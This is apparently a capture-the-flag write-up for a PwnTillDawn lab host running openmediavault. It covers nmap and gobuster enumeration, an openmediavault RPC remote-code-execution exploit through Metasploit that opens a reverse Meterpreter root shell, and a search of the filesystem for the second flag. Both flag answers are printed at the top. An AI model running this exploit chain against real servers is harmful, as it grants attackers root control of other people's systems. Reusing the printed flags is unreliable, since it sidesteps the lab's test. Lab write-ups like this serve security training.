FLAG1

0eec401289b483ffb2e3bcd5320f63dfb84ec765

FLAG2

d2213f1407809dfcbff2b1a3cc1ae7d72e88d643

Enumeration

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx
|_http-title: openmediavault control panel - library.pwntilldawn.local

gobuster dir -u 10.150.150.111 -w /usr/share/wordlists/dirb/common.txt -q -t 200

/css                  (Status: 301) [Size: 178] [--> <http://10.150.150.111/css/>]
/favicon.ico          (Status: 200) [Size: 1406]                                
/fonts                (Status: 301) [Size: 178] [--> <http://10.150.150.111/fonts/>]
/js                   (Status: 301) [Size: 178] [--> <http://10.150.150.111/js/>]   
/images               (Status: 301) [Size: 178] [--> <http://10.150.150.111/images/>]
/licenses             (Status: 301) [Size: 178] [--> <http://10.150.150.111/licenses/>]
/index.php            (Status: 200) [Size: 3419]                                     
/rpc                  (Status: 301) [Size: 178] [--> <http://10.150.150.111/rpc/>]

Exploitation

Going to http://10.150.150.111/ and saw the title openmediavault and quickly found out there is this blog https://www.obrela.com/openmediavault-remote-code-execution-rce-vulnerability/

Seems like we can use Metasploit

use exploit/unix/webapp/openmediavault_rpc_rce
set RHOSTS 10.150.150.111
set LHOST tun0
run

meterpreter > shell
Process 38147 created.
Channel 1 created.
whoami
root

We can easily get the FLAG1.txt under /root directory

0eec401289b483ffb2e3bcd5320f63dfb84ec765

FLAG2 is a pain

python3 -c "import pty;pty.spawn('/bin/bash')"

grep -rnw '/' -e 'FLAG2' 2>/dev/null

/etc/openmediavault/config.xml:307: <command>FLAG2=d2213f1407809dfcbff2b1a3cc1ae7d72e88d643</command>